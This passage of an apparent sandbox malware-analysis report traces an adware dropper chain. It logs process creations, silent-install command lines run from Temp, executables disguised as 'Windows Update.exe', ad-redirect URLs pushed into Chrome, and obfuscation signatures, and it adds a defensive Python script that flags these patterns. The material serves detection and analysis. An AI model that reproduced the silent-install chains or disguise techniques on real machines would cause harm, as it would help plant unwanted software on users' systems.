Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10546296038144766013,8885457530477492480,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1852 /prefetch:8
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (2 consecutive identical entries collapsed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,5678826982049071516,1403594556980502964,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1860 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown (24 consecutive identical entries collapsed)
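The process-creation entries above record three behaviours worth turning into detection logic: a .NET dropper (Vahutuqeke.exe) pushing a long series of third-party ad URLs into chrome.exe, executables placed under Program Files with names that either mimic an OS component ("Windows Update.exe" under "Windows Multimedia Platform") or look randomly generated (ROOKKLCFJB, TOHWVYYPNL.exe), and silent-install command lines (/S, /VERYSILENT, cmd.exe /k ... installer.exe /qn) rooted in the user's Temp directory. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses lines in the report's own "Source: ... Process created: ..." format and runs those three checks over them. The sample events are constructed from entries on this page plus two benign ones (explorer.exe opening www.example.com, and Chrome spawning its own utility child); the OS_LOOKALIKES list, the browser list, the three-launch threshold and the "eight or more uppercase letters" heuristic are assumptions of this example, not findings of the report.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: entries taken from the report (the first keeps the
# page's trailing link text to show it is tolerated) plus two benign events.
SAMPLE_EVENTS = r"""
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Process created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe "C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe" /S /UID=rec7
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654" & exit
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.example.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
""".strip().splitlines()

LINE_RE = re.compile(r"^Source:\s+(?P<parent>.+?)\s+Process created:\s+"
                     r"(?P<rest>.+?)(?:\s+Jump to behavior)?$")
# Image path ends at the first .exe/.tmp followed by whitespace (paths contain
# spaces, so no split()); .tmp covers the stub Inno Setup extracts.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.(?:exe|tmp))\s+(?P<cmd>.*)$", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+")
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
PROGRAM_FILES_RE = re.compile(r"^[A-Za-z]:\\Program Files( \(x86\))?\\", re.IGNORECASE)
WINDOWS_DIR_RE = re.compile(r"^[A-Za-z]:\\Windows\\", re.IGNORECASE)
RANDOM_SEGMENT_RE = re.compile(r"^[A-Z]{8,}(\.exe)?$")   # ROOKKLCFJB, TOHWVYYPNL.exe
SILENT_SWITCH_RE = re.compile(r"(?:^|\s)/(?:qn|s|silent|verysilent)(?=\s|$)", re.IGNORECASE)
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe")
# Assumed list (not from the report): names Windows only ships under C:\Windows.
OS_LOOKALIKES = {"windows update.exe", "svchost.exe", "csrss.exe", "lsass.exe"}

def parse_event(line):
    """Return {'parent', 'image', 'cmd'} for one report line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest")
    im = IMAGE_RE.match(rest)
    if im:
        image, cmd = im.group("image"), im.group("cmd")
    else:                                   # e.g. "unknown unknown"
        image, _, cmd = rest.partition(" ")
    return {"parent": m.group("parent"), "image": image, "cmd": cmd}

def browser_launch_abuse(events, min_launches=3):
    """Non-browser parents that push URLs into a browser at least
    min_launches times: {parent: {'launches': n, 'hosts': [...]}}."""
    by_parent = defaultdict(lambda: {"launches": 0, "hosts": set()})
    for ev in events:
        if not ev["image"].lower().endswith(BROWSERS) or ev["parent"].lower().endswith(BROWSERS):
            continue
        url = URL_RE.search(ev["cmd"])
        if url:
            by_parent[ev["parent"]]["launches"] += 1
            by_parent[ev["parent"]]["hosts"].add(urlsplit(url.group()).hostname)
    return {p: {"launches": e["launches"], "hosts": sorted(e["hosts"])}
            for p, e in by_parent.items() if e["launches"] >= min_launches}

def suspicious_images(events):
    """(path, reason) for executables that look dropped or disguised."""
    findings, seen = [], set()
    for ev in events:
        for path in (ev["parent"], ev["image"]):
            if path in seen:
                continue
            seen.add(path)
            segments = path.split("\\")
            random_seg = any(RANDOM_SEGMENT_RE.match(s) for s in segments)
            if segments[-1].lower() in OS_LOOKALIKES and not WINDOWS_DIR_RE.match(path):
                findings.append((path, "OS component name outside C:\\Windows"))
            elif random_seg and PROGRAM_FILES_RE.match(path):
                findings.append((path, "random uppercase name under Program Files"))
            elif random_seg and TEMP_RE.search(path):
                findings.append((path, "random uppercase executable in Temp"))
    return findings

def silent_installs_from_temp(events):
    """Command lines with a silent-install switch where the parent, the image,
    or a path inside the command line lives in the user's Temp directory."""
    return [ev["cmd"] for ev in events
            if SILENT_SWITCH_RE.search(ev["cmd"])
            and any(TEMP_RE.search(x) for x in (ev["parent"], ev["image"], ev["cmd"]))]

def analyze(lines=SAMPLE_EVENTS):
    events = [ev for ev in map(parse_event, lines) if ev]
    return {"events": len(events),
            "browser_abuse": browser_launch_abuse(events),
            "suspicious_images": suspicious_images(events),
            "silent_installs": silent_installs_from_temp(events)}

if __name__ == "__main__":
    for key, value in analyze().items():
        print(f"{key}: {value}")
```

On the sample, the browser check attributes five launches across four distinct hosts to Vahutuqeke.exe while explorer.exe's single page load stays below the threshold; the image check returns irecord.exe (random directory under Program Files), "Windows Update.exe" (OS name outside C:\Windows) and TOHWVYYPNL.exe (random name in Temp); the installer check returns the /S, /VERYSILENT and cmd.exe /k ... /qn command lines. The heuristics are deliberately narrow so they can be fed real EDR process-creation telemetry after swapping the parser for the sensor's field names.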
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_0045568C
Source: C:\Users\user\Desktop\1nJGU59JPU.exe File created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 1_2_00455EB4
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\i-record\I-Record.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Program Files (x86)\i-record\I-Record.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\i-record\I-Record.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: 1nJGU59JPU.exe String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
Source: 7((_8888YTR(.exe.1.dr, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs Cryptographic APIs: 'CreateDecryptor'
Source: ZHunuhebaqu.exe.3.dr, art_designers_deviantart_network_platform/hand__134d8bc4_5a96_40c9_89df_ad889dad771e__Damn_SHit.cs Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs Cryptographic APIs: 'CreateDecryptor'
Source: Vahutuqeke.exe.3.dr, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs Cryptographic APIs: 'CreateDecryptor'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Directory created: C:\Program Files\internet explorer\ROOKKLCFJB
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe.config
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
Source: 1nJGU59JPU.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: updater.pdbh source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source: Binary string: Publisher.pdbX source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp
Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb` source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source: Binary string: Recover.pdbh> source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb,"nbreDay": source: 7((_8888YTR(.exe, 00000003.00000002.324111810.0000000002E1A000.00000004.00000001.sdmp
Source: Binary string: Recover.pdb source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source: Binary string: I-Record.pdb8 source: 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source: Binary string: updater.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdbF source: 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp
Source: Binary string: I-Record.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb source: ZHunuhebaqu.exe, ZHunuhebaqu.exe, 00000014.00000002.361743821.0000000000512000.00000002.00020000.sdmp
Source: Binary string: e:\mydev\inno-download-plugin\ansi\idp.pdb source: 1nJGU59JPU.tmp, 00000001.00000002.336506814.000000000018F000.00000004.00000001.sdmp
Source: Binary string: Publisher.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs .Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Obfuscated command line found
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe Process created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp "C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp" /SL5="$50038,5808768,66560,C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Note: the /SL5="$<window handle>,<offset>,<offset>,<original installer path>" switch is the internal relaunch parameter an Inno Setup setup.exe passes to the copy of itself it extracts as is-XXXXX.tmp; it is installer plumbing, not attacker-controlled obfuscation, so this signature carries little weight on its own. The telling detail in the second line is /VERYSILENT: a second Inno Setup installer (irecord.exe) dropped under C:\Program Files\internet explorer\ROOKKLCFJB is being run with no user interface.
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004849F4 push 00484B02h; ret 1_2_00484AFA
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0040995C push 00409999h; ret 1_2_00409991
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00458060 push 00458098h; ret 1_2_00458090
